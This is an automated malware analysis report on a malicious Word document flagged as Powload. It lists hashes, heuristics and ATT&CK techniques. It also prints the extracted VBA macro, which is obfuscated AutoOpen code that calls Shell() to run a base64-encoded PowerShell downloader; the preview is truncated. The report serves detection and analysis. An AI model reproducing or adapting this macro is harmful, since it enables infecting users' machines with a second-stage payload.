Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3803bfbce21fffcf…

MALICIOUS

Office (OLE)

Size: 104.8 KB
Created: 2018-06-01 12:02:00
Authoring application: Microsoft Office Word
First seen: 2018-06-19
MD5: b1ea7ac5687d32fc0d6423b378544b3b
SHA-1: 83ed8157e6dd1df98cac7a86738560990c664389
SHA-256: 3803bfbce21fffcf67582832f8292d4e40e2417463b3040e293c1938179ef9c1
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine that calls a function which in turn executes a PowerShell command. The PowerShell command is obfuscated but appears to download and execute a second-stage payload. The presence of the Shell() call and the ClamAV detection strongly indicate malicious intent.

Heuristics (7)

  • ClamAV: Doc.Malware.Powload-7004511-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Powload-7004511-0
  • VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10440 bytes
SHA-256: 5c739e84d63b38565d13cdeab4648c6c228774d0b9380a4f2d047e0be3091d8a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "IYhHLpZiEaab"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pkBqPH()
On Error Resume Next
aPNID = 42218 + Log(58466) - jaDhU / Atn(2854) / twoAjN / ulQZbN
jzHcoE = CSng(29849 * CInt(7193) + 67849 - 64632)
tBAGi = 33884 + Log(86118) - uANnZ / Atn(36411) / jUcsi / QRzcwE
wMpOHo = CSng(73373 * CInt(22279) + 89415 - 78655)
pkBqPH = jljRwmPIi + Shell(tGjzi + Chr(vbKeyP) + XzQKscC + tOqdFHp + YPGGETGCN + waIrv + BmdwlohcURP + XsMOFjoz, BwQocQA + vbHide + DoITjRl)
wjPTu = 37319 + Log(19528) - JmYubr / Atn(6282) / djAdm / MPhKw
ljqlfZ = CSng(87843 * CInt(96109) + 60601 - 95621)
End Function
Sub Autoopen()
On Error Resume Next
jSOvt = 46326 + Log(34299) - XDWJb / Atn(89013) / QlTzl / Vdvcvm
CzFmf = CSng(24246 * CInt(38119) + 20598 - 45326)
pkBqPH
SrPva = 55249 + Log(30238) - OrUJI / Atn(58361) / MnLpTS / lCMawj
OaAsUA = CSng(14806 * CInt(42245) + 77630 - 89811)
End Sub


Attribute VB_Name = "fEjvvsp"
Function XzQKscC()
On Error Resume Next
hjkmA = 26620 + Log(87494) - qnWwfM / Atn(51875) / EkqLz / qzhhr
iEwqlN = CSng(11473 * CInt(33065) + 25506 - 30420)
wBfSRqNSXtw = "owersHeLL -e " + "IAAoAE4AZQ" + "B3AC0AbwBiAGoAR" + "QBjAHQA" + "IAAgAHMAeQBT" + "AFQAZ" + "QBNAC4ASQ" + "BPA"
mDaho = 84099 + Log(5331) - uJFEv / Atn(73459) / XZtnFT / BQloj
RGJGo = CSng(30186 * CInt(7992) + 15024 - 45364)
BwwwsMjIznc = "C4AQ" + "wBPAE0AUAB" + "SAGUAc" + "wBTA" + "Ek" + "AbwBOAC4ARABF" + "AGYAb" + "AB"
BFiPzh = 48749 + Log(99978) - DlqjX / Atn(50467) / BPBJv / LpzoAz
jirzw = CSng(84694 * CInt(64620) + 50928 - 6138)
sdiPqdOpf = "BAH" + "QA" + "ZQB" + "zAFQAU" + "gBlAE" + "EA" + "bQAoACAAWwBzA" + "HkAUwBUAEU" + "ATQAuAG" + "kAbwAuA"
Trlmc = 52993 + Log(52678) - mfiNo / Atn(11187) / iBtpQ / hajWV
rifskw = CSng(82283 * CInt(65870) + 34208 - 19514)
fUkbb = "G0AZQBtAE8" + "AcgBZAFMAV" + "AByAGUAYQB" + "tAF0" + "AWwBTAHkAUwBU" + "AEUATQAuAEMA" + "bwBuAFYARQBSAH" + "QAXQA6ADoAZ" + "gBy" + "AE8ATQBCA"
XzQKscC = wBfSRqNSXtw + BwwwsMjIznc + sdiPqdOpf + fUkbb
End Function
Function tOqdFHp()
On Error Resume Next
jOYON = 36856 + Log(73036) - tmlTq / Atn(76514) / nQlRBQ / hkrGn
OzXwUo = CSng(20151 * CInt(51738) + 83695 - 88020)
rpTJc = "EEAU" + "wBlADYANABzAHQA" + "UgBpAG4AZwA" + "oACcAVgBW" + "AEwAZg"
HzEcH = 11439 + Log(27284) - EwLawA / Atn(16176) / cjoXHf / DwOozB
KvWRKD = CSng(22889 * CInt(58393) + 50326 - 58439)
jnuhLSz = "BiAD" + "UAcwB3AEUAS" + "AA2AGYAdAB" + "QAC8AQgBpAGwAQ" + "gB0AFIARwB2ADMA" + "eAA2AFoAT" + "wBRAFoATwB"
RivDXb = 92387 + Log(23580) - huDWMb / Atn(11456) / ftROn / oQDiqE
wGJupz = CSng(93314 * CInt(346) + 48393 - 75466)
OYVLHFStP = "hAEoAYQBxAFcAUA" + "BhAFIAUwBXAGQA" + "dABWADIA" + "ZwB" + "QAE" + "cAT"
mKvPsA = 9915 + Log(67359) - LwjMOd / Atn(13389) / nTwFH / jotbW
JAGGYc = CSng(57221 * CInt(61186) + 46594 - 45601)
vQYloHPu = "wBN" + "AFUATgBHAEkA" + "UQBkAGsAagBU" + "AEsALw" + "A3" + "ADQANw" + "A0AEcAVgBJ"
ZHGaA = 48474 + Log(93821) - MqpMGq / Atn(74514) / DMbwYi / oKrao
zbjPPX = CSng(97157 * CInt(2096) + 61552 - 67341)
MvhwjiKFsA = "ADMASgAzAHgAZA" + "A5ADkAMwB" + "4ADEAMQBnAG4AYw" + "B5AGwAeQA4AGw"
wvKnU = 76140 + Log(1281) - mwZTw / Atn(48042) / qCSPIw / uMPGz
ToiXdM = CSng(3767 * CInt(56239) + 46084 - 33755)
ijhNqiL = "AMwBjAHMAY" + "QBvAH" + "AAUgBI" + "AFYATgBHAEo" + "AMABkADEARg"
XrLBp = 49831 + Log(15393) - qkjwiQ / Atn(51466) / oBzYN / KwzSBp
XBTkzs = CSng(32958 * CInt(74830) + 12819 - 9185)
siJai = "BEAG0ATAAxAHI" + "AUg" + "BjAE8AS" + "QBlAGgAcQ" + "BTAFYAdABxADgAc" + "gB"
HUGFmr = 90774 + Log(14258) - vNbat / Atn(12344) / jOEWYS / TjNLl
JihwK = CSng(33002 * CInt(88218) + 67934 - 8538)
fUiJQaGmPES = "1AEwAZw" + "A5AGY" + "AVQBKAHMAQg" + "B5AHcAQQ" + "BLAFEANwBCAEYA" + "OQ" + "BBAFUAQwBN" + "AFcAYwBDAEY" + "ASgBEAHMANw"
GXump = 17663 + Log(49429) - rrLkXC / Atn(65590) / oSnWZ / KjtRjf
cMzcF = CSng(96211 * CInt(98459) + 57107 - 6139
... (truncated)